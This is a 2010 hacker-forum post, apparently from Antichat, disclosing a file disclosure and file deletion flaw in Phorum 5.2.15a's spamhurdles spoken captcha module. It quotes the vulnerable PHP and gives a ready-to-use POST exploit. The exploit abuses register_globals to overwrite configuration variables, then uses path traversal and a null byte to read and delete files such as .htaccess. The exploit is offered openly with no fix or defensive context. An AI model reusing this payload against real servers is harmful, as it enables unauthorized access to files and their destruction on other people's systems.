23.05.2010, 13:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Phorum 5.2.15a File Disclosure + File Deletion Vulnerability
Phorum version 5.2.15a
File Disclosure + File Deletion
Vuln file: /mods/spamhurdles/captcha/spoken_captcha.php
PHP код:
/*...*/
global $PHORUM;
$conf = $PHORUM["mod_spamhurdles"];
if ($conf["spoken_captcha"] && file_exists($conf["flite_location"]) &&
isset($PHORUM["SPAMHURDLES"]["captcha"]["spoken_text"]))
{
/*...*/
$tmpfile = "{$PHORUM["cache"]}/spokencaptcha_{$key}.wav";
/*...*/
if (file_exists($tmpfile) and filesize($tmpfile) > 0) {
header("Content-Type: audio/x-wav");
header("Content-Disposition: attachment; filename=captchacode.wav");
header("Content-Length: " . filesize($tmpfile));
readfile($tmpfile);
unlink($tmpfile);
exit(0);
/*...*/
Need: magic_quotes = Off && register_globals = On
Exploit:
Код:
POST http://[host]/[path]/mods/spamhurdles/captcha/spoken_captcha.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
PHORUM[mod_spamhurdles][spoken_captcha]=1&PHORUM[mod_spamhurdles][flite_location]=spoken_captcha.php&PHORUM[SPAMHURDLES][captcha][spoken_text]=1&PHORUM[cache]=../../../scripts/.htaccess%00
__________________
Avant que l'ombre...
|
|
|